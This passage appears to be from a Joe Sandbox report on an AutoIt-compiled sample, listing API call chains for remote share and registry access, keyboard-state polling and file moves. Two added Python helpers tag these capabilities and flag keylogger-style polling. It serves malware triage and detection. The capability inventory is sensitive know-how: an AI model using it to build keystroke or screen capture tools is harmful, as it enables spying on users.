                                        • _wprintf.LIBCMT ref: 0036D68D
                                        • _wprintf.LIBCMT ref: 0036D6AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-2391861430
                                        • Opcode ID: 06011a402377065be492af0190428ed8ccbe2972edf4525fa8cd2ef6bcdeab46
                                        • Instruction ID: eb3f84eea646ec06fd157b1384b467fe885142909dd7421f4bc23c46dde67df1
                                        • Opcode Fuzzy Hash: 06011a402377065be492af0190428ed8ccbe2972edf4525fa8cd2ef6bcdeab46
                                        • Instruction Fuzzy Hash: 0651A871D00119BBCB17EB90DD82EEEB779AF04300F508166F105B61A5EB715F54CBA1
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0036D37F
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0036D3A0
                                        • __swprintf.LIBCMT ref: 0036D3F3
                                        • _wprintf.LIBCMT ref: 0036D499
                                        • _wprintf.LIBCMT ref: 0036D4B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-3420473620
                                        • Opcode ID: 3254595b47266ec82442c202077158c701bc1655cf1c527bc0a371a785d39ecf
                                        • Instruction ID: dd776a9c55988e7d9d7285474c0543d90c6cbd6f89e51202a88c0f2563173703
                                        • Opcode Fuzzy Hash: 3254595b47266ec82442c202077158c701bc1655cf1c527bc0a371a785d39ecf
                                        • Instruction Fuzzy Hash: D8519472D00119AACB17EBA0DD82EEEB779AF14700F108166F105B61A1EF756F58CBA1
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _memset.LIBCMT ref: 0035AF74
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0035AFA9
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0035AFC5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0035AFE1
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0035B00B
                                        • CLSIDFromString.COMBASE(?,?), ref: 0035B033
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0035B03E
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0035B043
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 1411258926-22481851
                                        • Opcode ID: 75efc16e32328dd1579207585dbd6757def98c1f1dfc99e0b4a6593b3f5b2ba6
                                        • Instruction ID: 080db67d1f8bf5193c1009b97c1a8c724de2df525199f23533a54badd9f3d8d3
                                        • Opcode Fuzzy Hash: 75efc16e32328dd1579207585dbd6757def98c1f1dfc99e0b4a6593b3f5b2ba6
                                        • Instruction Fuzzy Hash: 40411B76C1162DABCF12EBA4EC95DEEB778BF14700F01416AE901A71A0EB749E04CB90
                                        APIs
                                        • __swprintf.LIBCMT ref: 00367226
                                        • __swprintf.LIBCMT ref: 00367233
                                          • Part of subcall function 0034234B: __woutput_l.LIBCMT ref: 003423A4
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 0036725D
                                        • LoadResource.KERNEL32(?,00000000), ref: 00367269
                                        • LockResource.KERNEL32(00000000), ref: 00367276
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00367296
                                        • LoadResource.KERNEL32(?,00000000), ref: 003672A8
                                        • SizeofResource.KERNEL32(?,00000000), ref: 003672B7
                                        • LockResource.KERNEL32(?), ref: 003672C3
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00367322
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID: L6=
                                        • API String ID: 1433390588-1471508690
                                        • Opcode ID: b3a690187fd5ca56f68cabbb2b47121a64d02e52880188ffc7c9b47f549ea694
                                        • Instruction ID: 658b4012fed8b4d05f4d54da81394c8a19a2525c44b200f70da69c5d06fab094
                                        • Opcode Fuzzy Hash: b3a690187fd5ca56f68cabbb2b47121a64d02e52880188ffc7c9b47f549ea694
                                        • Instruction Fuzzy Hash: F331CDB590425AABDB139F60DC88AEF7BACFF09344F508825FD02E6250E734D950DAB0
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0036843F
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00368455
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00368466
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00368478
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00368489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: 1e1248f8720324610486d4c6aceff25fe3ed1c0e199d5c2b53dedbc093ff61d4
                                        • Instruction ID: a525ec3af9f304aca283d101088d7fd485851f29050c83d66290559c0b2bab3d
                                        • Opcode Fuzzy Hash: 1e1248f8720324610486d4c6aceff25fe3ed1c0e199d5c2b53dedbc093ff61d4
                                        • Instruction Fuzzy Hash: 8811E7B2A4016D79D713A7A2EC4ADFF7B7CEB95B00F00492AF411A61D5DEA04E44C5B1
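The call chains in the blocks above are recognisable capability primitives: the GetDC / CreateCompatibleBitmap / StretchBlt / GetDIBits sequence at 0037A2DD grabs screen content into a DIB, the WNetAddConnection2W / RegConnectRegistryW / CLSIDFromString sequence at 0035AFA9 maps a remote IPC$ share and resolves a CLSID from the remote HKLM\SOFTWARE\Classes hive, the mciSendStringW sequence at 0036843F plays audio through MCI, and the EnumThreadWindows / FindWindowExW("BUTTON") / EndDialog loop at 003680EC dismisses dialog boxes. One caveat a triager should keep in mind: the block at 003632D1 carries the AutoIt interpreter's own strings (">>>AUTOIT SCRIPT<<<", "Bad directive syntax error"), so the dumped module is the interpreter stub and all of this native code belongs to its runtime; whether the embedded script actually exercises a given chain has to be confirmed from the extracted script, not from this listing alone. The following added example, which is not part of the Joe Sandbox report and is not a Joe Sandbox signature, parses function listings in this format and tags each function with a capability label. The API-set patterns in CAPABILITIES and the label names are the editor's assumptions, and SAMPLE is constructed from lines copied out of the blocks above.

```python
"""Capability tagging over Joe Sandbox function-level "APIs" listings.

Added example: not part of the Joe Sandbox report and not a Joe Sandbox
signature. CAPABILITIES holds the editor's assumed API-set patterns; SAMPLE is
constructed from lines copied out of the report's function blocks.
"""
import re

# Matches "• Name.MODULE(args), ref: ADDR" and "• Name.MODULE ref: ADDR".
# Subcall entries carry a "Part of subcall function XXXXXXXX:" prefix.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.([A-Z0-9]+)\b"
)

# One list of requirements per capability; each requirement is a set of
# alternative API names, any of which satisfies it. Assumed patterns.
CAPABILITIES = {
    "screen_capture": [{"GetDC"}, {"CreateCompatibleBitmap"},
                       {"BitBlt", "StretchBlt"}, {"GetDIBits"}],
    "remote_registry_com": [{"WNetAddConnection2W"}, {"RegConnectRegistryW"},
                            {"CLSIDFromString"}],
    "mci_audio_playback": [{"mciSendStringW"}],
    "dialog_autodismiss": [{"EnumThreadWindows"}, {"FindWindowExW"},
                           {"SendMessageW"}, {"EndDialog"}],
    "icon_from_resource": [{"FindResourceW"}, {"LoadResource"},
                           {"CreateIconFromResourceEx"}],
}

# Constructed input: three "APIs" sections copied from the report above.
SAMPLE = r"""
APIs
• GetDC.USER32(00000000), ref: 0037A2DD
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0037A2E9
• CreateCompatibleDC.GDI32(?), ref: 0037A2F5
• SelectObject.GDI32(00000000,?), ref: 0037A302
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0037A356
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0037A392
• ReleaseDC.USER32(00000000,?), ref: 0037A3D9
Strings
Memory Dump Source
APIs
  • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
• _memset.LIBCMT ref: 0035AF74
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0035AFA9
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0035AFC5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0035AFE1
• CLSIDFromString.COMBASE(?,?), ref: 0035B033
Strings
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0036843F
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00368478
Strings
"""


def parse_blocks(text):
    """Return one dict per function block: {"direct": [...], "subcall": [...]}.

    A block opens at a line reading "APIs" and closes at the next non-bullet
    line (in the report that is the "Strings" label).
    """
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"direct": [], "subcall": []}
            blocks.append(current)
            continue
        if current is None:
            continue
        if not line.startswith("•"):
            if line:
                current = None  # "Strings", "Memory Dump Source", ...
            continue
        m = API_LINE.match(line)
        if m:
            kind = "subcall" if "Part of subcall" in line else "direct"
            current[kind].append((m.group(1), m.group(2)))
    return blocks


def tag_capabilities(block):
    """Capabilities whose every requirement is met by a direct call."""
    names = {name for name, _module in block["direct"]}
    return [cap for cap, reqs in CAPABILITIES.items()
            if all(names & alt for alt in reqs)]


def analyse(text):
    """[(sorted direct API names, [capability tags]), ...] in report order."""
    return [(sorted({n for n, _ in b["direct"]}), tag_capabilities(b))
            for b in parse_blocks(text)]


if __name__ == "__main__":
    for apis, caps in analyse(SAMPLE):
        print(", ".join(caps) or "-", "<-", " ".join(apis))
```

Run it over a saved copy of the report text to get one capability line per function; only direct calls are matched, because a "Part of subcall function" entry belongs to a callee that will be tagged in its own block. A match here states what the interpreter's native code can do, not what the compiled script does.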
                                        APIs
                                        • GetClientRect.USER32(?), ref: 0039EC32
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0039EC49
                                        • GetWindowDC.USER32(?), ref: 0039EC55
                                        • GetPixel.GDI32(00000000,?,?), ref: 0039EC64
                                        • ReleaseDC.USER32(?,00000000), ref: 0039EC76
                                        • GetSysColor.USER32(00000005), ref: 0039EC94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID: @U=u
                                        • API String ID: 272304278-2594219639
                                        • Opcode ID: 7477dea19735847ac4a6b6b76c0225c4a960beef33c874a806e3e344ad64a885
                                        • Instruction ID: 0725fa998927c80c996948fbaacd132c00684be67984f383e008650d81127465
                                        • Opcode Fuzzy Hash: 7477dea19735847ac4a6b6b76c0225c4a960beef33c874a806e3e344ad64a885
                                        • Instruction Fuzzy Hash: A2216A31500205FFDB62AF64EC88BE97BB9EB06325F518224FA66A54F1CB314A41DF21
                                        APIs
                                          • Part of subcall function 0036C6A0: __time64.LIBCMT ref: 0036C6AA
                                          • Part of subcall function 003241A7: _fseek.LIBCMT ref: 003241BF
                                        • __wsplitpath.LIBCMT ref: 0036C96F
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcscpy.LIBCMT ref: 0036C982
                                        • _wcscat.LIBCMT ref: 0036C995
                                        • __wsplitpath.LIBCMT ref: 0036C9BA
                                        • _wcscat.LIBCMT ref: 0036C9D0
                                        • _wcscat.LIBCMT ref: 0036C9E3
                                          • Part of subcall function 0036C6E4: _memmove.LIBCMT ref: 0036C71D
                                          • Part of subcall function 0036C6E4: _memmove.LIBCMT ref: 0036C72C
                                        • _wcscmp.LIBCMT ref: 0036C92A
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF49
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF5C
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0036CB8D
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0036CC24
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0036CC3A
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0036CC4B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0036CC5D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                        • String ID:
                                        • API String ID: 152968663-0
                                        • Opcode ID: 2dade983973cd52f9f15dc94ecb6de433c7f4a62ce54c089dd6da69929d7a1ff
                                        • Instruction ID: 0074fff89ca7da93934894d53c7284398a1f6b09d1a169b9d9f411e5ba4d3bbe
                                        • Opcode Fuzzy Hash: 2dade983973cd52f9f15dc94ecb6de433c7f4a62ce54c089dd6da69929d7a1ff
                                        • Instruction Fuzzy Hash: D9C11CB1900129AADF12DF95CC81EEEB7BDEF49310F0080A6F649EB155D7709A84CF65
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                        • String ID:
                                        • API String ID: 3566271842-0
                                        • Opcode ID: 93dffb347f7d4c1716fa1b99aadeccd988f45f19f7803914c0c9dcab28131211
                                        • Instruction ID: b8d2492dcb055b4bf891377449fc93179e8635ead767fab58b4e3de8b6b0cdb2
                                        • Opcode Fuzzy Hash: 93dffb347f7d4c1716fa1b99aadeccd988f45f19f7803914c0c9dcab28131211
                                        • Instruction Fuzzy Hash: 6C712C75A00219EFDB15DFA4D885ADEB7B8FF49310F048095E919AB261DB34EE40CF90
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00363908
                                        • SetKeyboardState.USER32(?), ref: 00363973
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00363993
                                        • GetKeyState.USER32(000000A0), ref: 003639AA
                                        • GetAsyncKeyState.USER32(000000A1), ref: 003639D9
                                        • GetKeyState.USER32(000000A1), ref: 003639EA
                                        • GetAsyncKeyState.USER32(00000011), ref: 00363A16
                                        • GetKeyState.USER32(00000011), ref: 00363A24
                                        • GetAsyncKeyState.USER32(00000012), ref: 00363A4D
                                        • GetKeyState.USER32(00000012), ref: 00363A5B
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00363A84
                                        • GetKeyState.USER32(0000005B), ref: 00363A92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: f302f738d663cf5a58298afb7a557878de3535997a2767d3bdf39d6c7eae6c31
                                        • Instruction ID: feafd8609fe5a5eea2de783a228a2d53d4d074799e9bbd1b929e63bb85550dff
                                        • Opcode Fuzzy Hash: f302f738d663cf5a58298afb7a557878de3535997a2767d3bdf39d6c7eae6c31
                                        • Instruction Fuzzy Hash: D151A920E0878429FB37EBA488117EAAFF45F12344F09C59DD5C25B5C6DB649B8CCB62
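Added example, not part of the Joe Sandbox output and not code from the analysed sample: a small Python triage helper that parses call-site bullets of the shape shown in this report into records, decodes the hex arguments, and flags the two behaviours visible in the lists above (the DeleteFileW/CopyFileW/DeleteFileW sequence at 0036CB8D..0036CC5D and the GetKeyboardState/GetAsyncKeyState/GetKeyState polling of modifier keys at 00363908..00363A92). The sample lines are constructed from the report's format with shortened argument lists; the virtual-key name table, the "copy then delete" ordering heuristic and the keylogger-polling threshold are the example's own assumptions, not sandbox logic.

```python
"""Triage helper for Joe Sandbox 'APIs' bullet lines (added example, not sandbox code)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: lines in the shape the report prints, with the
# sixteen-slot argument lists shortened. Not copied verbatim from the sandbox.
SAMPLE_LINES = """\
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001), ref: 0036CB8D
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001), ref: 0036CC3A
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001), ref: 0036CC4B
  • Part of subcall function 0036C6E4: _memmove.LIBCMT ref: 0036C71D
• _wcscmp.LIBCMT ref: 0036C92A
• GetKeyboardState.USER32(?), ref: 00363908
• SetKeyboardState.USER32(?), ref: 00363973
• GetAsyncKeyState.USER32(000000A0), ref: 00363993
• GetKeyState.USER32(000000A0), ref: 003639AA
• GetAsyncKeyState.USER32(00000011), ref: 00363A16
• GetAsyncKeyState.USER32(0000005B), ref: 00363A84
"""

# One bullet per call site:  [Part of subcall function X:] Api.MODULE[(args)][,] ref: ADDR
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_][\w@]*)\.([A-Z0-9]+)"
    r"(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# Virtual-key codes a keystroke logger polls to track modifier state (assumed table).
MODIFIER_VK = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
}
KEY_POLL_APIS = {"GetAsyncKeyState", "GetKeyState"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # None for '?', otherwise a signed int decoded from the hex field
    ref: int               # call-site address
    caller: Optional[int]  # set when the line is a 'Part of subcall function' entry


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    sign = -1 if tok.startswith("-") else 1
    return sign * int(tok.lstrip("-"), 16)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for a call-site bullet, or None for any other report line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    caller, api, module, raw_args, ref = m.groups()
    args = tuple(_parse_arg(a) for a in raw_args.split(",")) if raw_args is not None else ()
    return ApiCall(api, module, args, int(ref, 16), int(caller, 16) if caller else None)


def parse_report(text: str) -> list:
    """Parse every bullet that looks like a call-site entry; skip everything else."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def find_indicators(calls: list) -> dict:
    """Flag modifier-key polling and copy-then-delete within one function's call list."""
    own = [c for c in calls if c.caller is None]  # ignore inlined subcall entries
    polled = []
    for c in own:
        if c.api in KEY_POLL_APIS and c.args and c.args[0] in MODIFIER_VK:
            name = MODIFIER_VK[c.args[0]]
            if name not in polled:
                polled.append(name)
    state_apis = {c.api for c in own} & {"GetKeyboardState", "SetKeyboardState"}
    # Heuristic: call-site addresses ascend within a function in the report, so a
    # DeleteFileW at a higher ref than a CopyFileW reads as copy-then-delete (a move).
    copies = [c.ref for c in own if c.api == "CopyFileW"]
    deletes = [c.ref for c in own if c.api == "DeleteFileW"]
    return {
        "keylogger_polling": len(polled) >= 2 and bool(state_apis),
        "modifiers_polled": polled,
        "copy_then_delete": any(d > cp for cp in copies for d in deletes),
    }


if __name__ == "__main__":
    for key, value in find_indicators(parse_report(SAMPLE_LINES)).items():
        print(f"{key}: {value}")
```

Run against the full "APIs" list of one function at a time; merging the lists of several functions would let the copy-then-delete ordering heuristic pair unrelated call sites.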
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 0035FB19
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FB2B
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0035FB89
                                        • GetDlgItem.USER32(?,00000002), ref: 0035FB94
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FBA6
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0035FBFC
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035FC0A
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FC1B
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0035FC5E
                                        • GetDlgItem.USER32(?,000003EA), ref: 0035FC6C
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0035FC89
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0035FC96
